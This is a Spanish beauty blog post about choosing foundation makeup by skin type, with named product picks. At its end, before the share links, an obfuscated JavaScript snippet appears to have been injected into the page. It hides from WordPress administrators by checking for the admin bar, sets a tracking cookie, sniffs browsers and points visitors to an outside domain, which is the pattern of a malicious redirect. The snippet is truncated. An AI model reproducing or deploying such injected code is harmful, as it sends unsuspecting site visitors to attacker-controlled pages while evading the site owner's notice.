Hace unos días, conocí a una chica a la que no podía dejar de mirar y con el tiempo me preguntaba una y otra vez por qué sería. ¡Tenía una piel preciosa! Nada de imperfecciones, un acabado perfecto, muy hidratada y un tono precioso. ¿Qué maquillaje usará? Claro, no me atreví a preguntárselo pero os confieso que me quedé con las ganas. A partir de ahí, he investigado qué tipo de base de maquillaje deberíamos usar según el tipo de piel que tengamos. ¿Quieres saber qué es lo que más te conviene?

que-tipo-de-base-usar-segun-mi-piel

Una de las claves para que tu cara tenga una apariencia bella es el tono que elijamos. Trata de usar siempre el mismo tono de tu piel para que el resultado sea natural. Si quieres añadir un tono más, no lo hagas en la base del maquillaje, otros productos como los polvos matizadores o el colorete te ayudarán a conseguirlo. Si tu piel es rosada, opta por los beige. Si es apagada, una base ligeramente rosada será perfecta y si es morena, los tonos dorados te aportarán un toque muy bonito al rostro.

como-elegir-una-base-de-maquillaje

Cómo mejorar el rostro apagado y triste

Las pieles secas no tienen luz, suelen estar tirantes y no suelen ser muy atractivas. Lo que necesitan es precisamente un extra de hidratación, para que recuperen la luminosidad y buen aspecto que han perdido. La edad también influye, a veces la sequedad en la dermis aumenta con el paso de los años. Por eso, con esta base de maquillaje para pieles maduras que te recomendamos, Skin Caviar Concealer Foundation de La Prairie, con su fórmula extra-hidratante, conseguirás mejorar las líneas de expresión y devolverle la firmeza que ha perdido.

Las pieles mixtas o grasas tienen el problema contrario: les sobra agua y por tanto, aparecen frecuentemente brillos en ellas. Además, muchas veces los granitos u otras imperfecciones afloran sin poder impedirlo. Si es tu caso, un producto perfecto que puedes probar es Double Wear Water Fresh Spf 30 de Estée Lauder, una base de maquillaje ultra ligera que te dejará la piel natural y preciosa. Además, tiene protección solar de factor 30 para protegerte durante todo el día.

tipos-de-base

Protégete siempre del sol

Especialmente si tienes la piel sensible, tendrás que protegerla de los posibles efectos del sol tanto en verano como en invierno. ¡No bajes la guardia! En tu caso, deberías utilizar una base con una protección alta. Obtendrás el mismo resultado pero estarás protegida. Nuestra recomendación es Everlasting Cushion SPF50 de Clarins, con una textura fresca que deja que la dermis respire a la vez que consigue un efecto muy natural.

El maquillaje en polvo resulta ser otra de las alternativas para usar sobre el rostro en lugar de maquillaje líquido. Lo hay para todo tipo de pieles y el resultado es muy bueno también. El Total Finish Foundation Refill de Sensai tiene una textura muy ligera aportándole al rostro la humedad necesaria y dejando su aspecto matizado y muy sedoso.

Y para ti, ¿cuál es esa base de maquillaje que te ha deja un efecto increíble en la piel?

 

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone